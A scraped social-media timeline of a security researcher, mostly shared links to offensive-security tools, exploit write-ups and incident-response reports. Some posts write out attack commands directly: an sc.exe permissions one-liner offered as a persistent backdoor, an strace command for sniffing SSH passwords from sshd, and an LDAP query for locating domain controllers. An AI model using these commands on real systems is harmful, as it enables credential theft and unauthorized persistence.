Joined September 2009
- Tweets 1,318
- Following 222
- Followers 440
- Likes 7
30 Photos and videos
Gleb Gritsai retweeted
31 May 2023
Sharing highlights from incident response cases in 2022 by @AymanShaaban in brighttalk.com/webcast/18657…. You can get the slides github.com/klsecservices/Pub… and the analyst report github.com/klsecservices/Pub… #dfir #incidentresponse
4
2
533
Gleb Gritsai retweeted
29 Mar 2023
This works on Windows 11 and both Gmail and MSFT will let it through to the inbox. Confirmed by @amitchell516 and @samkscholten
New detection/hunt rule is live for this, which looks for UNC paths inside URL file attachments (h/t @amitchell516!):
github.com/sublime-security/…
26 Mar 2023
.url is great. The file doesn't even need to be opened, if you can get a user to download it and they go to delete it, just opening the Downloads folder sends the hash :D
2
55
111
41,997
Gleb Gritsai retweeted
31 Mar 2023
You still need to "train" it on the specific keyboard and you need to have sort of "ideal" conditions, but yeah -- it's a fun tool :)
Give it a try if you have a mechanical keyboard. There are examples you can run directly in your browser via WASM
github.com/ggerganov/kbd-aud…
this tool lets you extract text from an audio recording of keyboard strokes, right now, for free
i am not making this shit up, you can potentially steal a password from an audio recording in an office
2
15
182
46,586
Gleb Gritsai retweeted
29 Mar 2023
I'd like to publicly introduce BinSync, a cross-decompiler collaboration tool and suite. With BinSync, you can finally share reversing data, like Types, across all your favorite decompilers (IDA, Binja, Ghidra, angr) on-the-fly. github.com/binsync/binsync. See thread for demos.
4
82
261
31,753
Gleb Gritsai retweeted
29 Mar 2023
There are two rules in life:
1) Never give out all the information.
339
3,769
25,470
3,603,729
Gleb Gritsai retweeted
26 Mar 2023
Interesting paper on finding and exploiting vulns within H.264 decoders: wrv.github.io/h26forge.pdf
45
132
27,816
Gleb Gritsai retweeted
21 Mar 2023
🧵Some of my favorite LDAP queries. I let you all infer which tools to use them with. Most of these are from places around the web, nothing new. Just a list.
1. Find all DCs:
(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))
7
111
450
65,100
Gleb Gritsai retweeted
20 Mar 2023
Automatically decrypt encryptions without knowing the key or cipher, decode encodings, and crack hashes github.com/Ciphey/Ciphey
19
248
922
118,577
Gleb Gritsai retweeted
14 Mar 2023
My latest research which completely breaks trust transitivity, enjoy :-)
exploit.ph/external-trusts-a…
8
176
385
48,139
Gleb Gritsai retweeted
14 Mar 2023
We've just published a quick write up on CVE-2023-23397, which allows a remote adversary to leak NetNTLMv2 hashes: mdsec.co.uk/2023/03/exploiti… by @domchell
9
407
813
302,790
Gleb Gritsai retweeted
26 Feb 2023
New AMSI lifetime bypass, it works by searching for the first byte of each instruction to prevent updates from affecting it, Check it out.
#amsi #redteam #cybersecurity
github.com/ZeroMemoryEx/Amsi…
6
180
491
59,155
Gleb Gritsai retweeted
23 Feb 2023
Zero Trust is a security strategy. It is not a product or a service, but an approach in designing and implementing the following set of security principles:
- Verify explicitly
- Use least privilege access
- Assume breach
Updated Information here: lnkd.in/g5UmGgEm
18
62
3,753
Gleb Gritsai retweeted
23 Feb 2023
Need an almost invisible, post-exploitation, persistent, fileless, LPE backdoor? There are many, but this one looks really beautiful for me: type "sc.exe sdset scmanager D:(A;;KA;;;WD)" from an elevated command prompt.
39
364
1,323
302,478
Cool blog post by @xilokar on embedded devices reverse engineering, ARM TrustZone and secure boot bypass
blog.xilokar.info/firmware-k…
#iot #embedded #infosec #cybersecurity #hacking
2
87
242
28,458
Gleb Gritsai retweeted
23 Jan 2023
Check out the latest articles from the Payment Village blog paymentvillage.org/blog :
1. How I used deepfakes to bypass security verifications in a bank.
My first experience with hacking ongoing due diligence checks using deepfake and ML.
6
10
2,526
Very cool series by @__pberba__ about persistence in Linux environments
Persistence map: pberba.github.io/assets/post…
Auditd, Sysmon, Osquery: pberba.github.io/security/20…
Account Creation and Manipulation: pberba.github.io/security/20…
#Linux #kernel #malware #infosec #cybersecurity
3
187
476
53,687
Sniffing SSH passwords
TL;DR
# pgrep -l sshd
6235 sshd
# strace -f -p 6235 -e trace=write -o capture
networklogician.com/2021/04/…
12
216
804
Gleb Gritsai retweeted
11 Oct 2022
"Hello World under the microscope" - an article we wrote together with @gynvael and @j00ru! Originally published in issue 100 (1/2022) of the Programista magazine, now available online in Polish and English. asawicki.info/articles/Hello…
2
64
262